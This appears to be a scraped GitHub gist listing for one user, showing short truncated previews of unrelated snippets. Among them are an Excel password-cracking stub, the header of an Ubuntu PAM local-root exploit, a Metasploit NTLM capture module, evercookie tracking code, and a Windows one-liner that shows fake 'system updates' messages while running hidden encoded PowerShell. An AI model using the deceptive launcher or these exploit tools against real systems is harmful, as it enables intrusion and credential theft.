gabemarshall

import sys
import win32com.client
openedDoc = win32com.client.Dispatch("Excel.Application")
filename= sys.argv[1]

password_file = open ( 'wordlist.lst', 'r' )
passwords = password_file.readlines()
password_file.close()

passwords = [item.rstrip('\n') for item in passwords]

gabemarshall

#!/bin/bash
# If installing elinks via homebrew, install with `brew install elinks --devel` 

MYURL="http://explainshell.com/explain?cmd="

count=0

for var in "$@"

do

gabemarshall

#!/bin/bash
#
# Exploit Title: Ubuntu PAM MOTD local root
# Date: July 9, 2010
# Author: Anonymous
# Software Link: http://packages.ubuntu.com/
# Version: pam-1.1.0
# Tested on: Ubuntu 9.10 (Karmic Koala), Ubuntu 10.04 LTS (Lucid Lynx)
# CVE: CVE-2010-0832
# Patch Instructions: sudo aptitude -y update; sudo aptitude -y install libpam~n~i

gabemarshall

# Reference:  http://www.pement.org/sed/sed1line.txt


-------------------------------------------------------------------------
USEFUL ONE-LINE SCRIPTS FOR SED (Unix stream editor)        Dec. 29, 2005
Compiled by Eric Pement - pemente[at]northpark[dot]edu        version 5.5

Latest version of this file (in English) is usually at:
   http://sed.sourceforge.net/sed1line.txt
   http://www.pement.org/sed/sed1line.txt

gabemarshall

# OSX for Pentesting (Mavericks/Yosemite)
#
# A fork of OSX for Hackers (Original Source: https://gist.github.com/brandonb927/3195465)
 
#!/bin/sh
 
# Ask for the administrator password upfront

echo "Have you read through the script prior to running this? (y or n)"
read bcareful

gabemarshall

function _ec_dump(e,t){var n="";if(!t)t=0;var r="";for(var i=0;i<t+1;i++)r+="    ";if(typeof e=="object"){for(var s in e){var o=e[s];if(typeof o=="object"){n+=r+"'"+s+"' ...\n";n+=_ec_dump(o,t+1)}else{n+=r+"'"+s+"' => \""+o+'"\n'}}}else{n="===>"+e+"<===("+typeof e+")"}return n}function _ec_replace(e,t,n){if(e.indexOf("&"+t+"=")>-1||e.indexOf(t+"=")==0){var r=e.indexOf("&"+t+"=");if(r==-1)r=e.indexOf(t+"=");var i=e.indexOf("&",r+1);var s;if(i!=-1)s=e.substr(0,r)+e.substr(i+(r?0:1))+"&"+t+"="+n;else s=e.substr(0,r)+"&"+t+"="+n;return s}else return e+"&"+t+"="+n}function _evercookie_flash_var(e){_global_lso=e;var t=$("#myswf");if(t&&t.parentNode)t.parentNode.removeChild(t)}function onSilverlightLoad(e,t){var n=e.getHost();_global_isolated=n.Content.App.getIsolatedStorage()}function onSilverlightError(e,t){_global_isolated=""}function DetectIphone(){if(uagent.search(deviceIphone)>-1){if(DetectIpad()||DetectIpod())return false;else return true}else return false}function DetectIpod(){if(uagent.search(deviceIpod)>-1

gabemarshall

#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

#define CANARY "in_the_coal_mine"

struct {
  char buffer[1024];

gabemarshall

Keybase proof

I hereby claim:

• I am gabemarshall on github.
• I am tehskylark (https://keybase.io/tehskylark) on keybase.
• I have a public key whose fingerprint is 154F E7AE 6BB1 3694 A23C DA7B A6E4 E466 86E5 5D54

To claim this, I am signing this object:

gabemarshall

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
# A fork of http ntlm capture module
# ProxySG SA97
# https://bto.bluecoat.com/security-advisory/sa93
##

require 'msf/core'

gabemarshall

start cmd.exe @cmd /k "echo Installing system updates.. && timeout 3 >nul && echo Finalizing installation.. && timeout 3 >nul && echo Updates Complete! && timeout 1 >nul && taskkill /IM cmd.exe" & powershell -nop -win hidden -noni -enc <base64 encoded payload here>